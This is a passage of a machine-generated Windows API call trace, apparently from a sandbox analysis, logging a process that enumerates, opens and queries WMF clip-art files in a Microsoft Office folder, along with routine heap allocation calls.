dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 69 [0101.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.740] GetFileType (hFile=0x33c) returned 0x1 [0101.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.741] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.741] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.741] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.741] CloseHandle (hObject=0x33c) returned 1 [0101.741] AreFileApisANSI () returned 1 [0101.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0101.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 69 [0101.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.741] GetFileType (hFile=0x33c) returned 0x1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.742] CloseHandle (hObject=0x33c) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.743] AreFileApisANSI () returned 1 [0101.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0101.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 69 [0101.743] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e0)) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0101.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.743] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04323_.WMF", cAlternateFileName="")) returned 1 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0101.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0101.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.744] AreFileApisANSI () returned 1 [0101.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0101.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.745] AreFileApisANSI () returned 1 [0101.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0101.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 69 [0101.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.745] GetFileType (hFile=0x33c) returned 0x1 [0101.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0101.745] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.745] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.746] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.746] CloseHandle (hObject=0x33c) returned 1 [0101.746] AreFileApisANSI () returned 1 [0101.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0101.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 69 [0101.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.746] GetFileType (hFile=0x33c) returned 0x1 [0101.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0101.746] CloseHandle (hObject=0x33c) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.748] AreFileApisANSI () returned 1 [0101.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0101.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 69 [0101.748] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bc)) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0101.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.748] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc89dc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc89dc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd14, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04326_.WMF", cAlternateFileName="")) returned 1 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0101.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0101.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0101.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0101.749] HeapFree (in: hHeap=0x20000, 